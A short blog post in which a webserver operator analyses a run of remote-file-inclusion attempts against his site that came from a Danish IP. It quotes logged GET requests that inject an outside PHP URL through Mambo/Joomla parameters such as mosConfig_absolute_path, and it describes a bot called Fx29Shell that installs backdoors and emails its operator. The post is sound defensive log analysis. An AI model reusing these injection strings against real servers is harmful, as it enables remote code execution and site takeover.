2009-11-19 4 months ago
Somebody in Denmark thought something in this webserver would run some default and vulnerable software and tried to find a hole:$ grep -c 90.185.249.111 ~httpd/idefix/logs/access_log 4208All tries to display http://www.spotmerkezi.com/cache/id1.txt which is a bit of PHP source:<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>Which will display ShiroHige as one word when run through the php processor.All urls are attempts where it is assumed some vulnerable script is behind some visible part of the site such as the root, or my homepage, or some part of my homepage. Samples:
GET //?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt?? GET /~koos//?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt?? GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt?? GET /~koos/newsitem.cgi//?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt?? GET /~koos/newsitem.cgi//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt?? GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20http://www.spotmerkezi.com/cache/id1.txt?? GET /~koos/newstag.cgi/security%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt?? GET /~koos/newstag.cgi/security%20%20//modules/mod_weather.php?absolute_path=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??A bit of research finds that the next bit of code to execute would try to get info on the php setup (os, rights, free disk space). The third bit is running an entire bot with a few backdoors. I tried to find where the backdoor would connect to but that is all dynamic, only when the third script is loaded via the vulnerability a number of variables are set with the IP and port to connect to.Like any good bot, it also notifies its maker in a hidden away part of its source, which would look like:
To: feelcomz@gmail.com Subject: Fx29Shell http://server.name/vulnerable.url by 10.2.1.1 Boss, there was an injected target on http://server.name/vulnerable.url by 10.2.1.1Searching on the term Fx29Shell gives a scary answer: Results 1 - 10 of about 221,000 for Fx29Shell. a lot of those still showing webservers where this script is active.But all my home-made webstuff is not in the habit of executing remote php scripts. But given the load of sites hosted on 90.185.249.111 it's probably a script running on that server which got hacked from a third place.
